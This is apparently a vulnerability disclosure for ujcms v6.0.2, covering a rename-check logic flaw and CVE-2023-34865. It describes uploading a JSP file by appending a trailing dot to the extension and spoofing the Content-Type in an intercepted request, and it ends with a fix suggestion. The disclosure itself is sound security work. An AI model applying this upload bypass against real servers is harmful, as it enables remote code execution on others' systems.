    So there is a problem with the judgment logic here, it should be || instead of &&, which leads to the failure of the security check in this place. Of course, this is also the reason why it can be used successfully.  
    After passing the verification of this block, use File.renameTo in com.ujcms.util.file.LocalFileHandler#rename to rename the file.  
      
    renameTo cannot overwrite files in Windows, but can overwrite and create directories in Linux, so this vulnerability can only be exploited in Linux.

CVE-2023-34865: There is a remote code execution (RCE) vulnerability exists in ujcms v6.0.2 · Issue #5 · ujcms/ujcms

File upload vulnerability in ujcms 6.0.2 via /api/backend/core/web-file-upload/upload.

Hello, I found that your ujcms v6.0.2 version has an arbitrary file upload vulnerability in the background.  
In the background file -> upload file here, we can upload files, I know you have made restrictions on the suffix of the uploaded file name, for example, jsp files are not allowed to be uploaded. But we can bypass the check by capturing the packet and modifying the file name to "1.jsp." (adding a decimal point to the suffix).

1.  Try to upload 1.jsp file, but it is blocked  
    
2.  Use burpsuite to capture the package, modify the file name to "1.jsp." and then change the Content-Type to "image/png" to upload successfully  
      
    
3.  Click Browse to download the file, and the suffix of the downloaded file is "jsp" instead of "jsp."  
      
    

4.Suggestion: Check whether the suffix of the uploaded file name is normal, and prevent the suffix of the malformed symbol like "jsp." from bypassing the security check

Tag

#js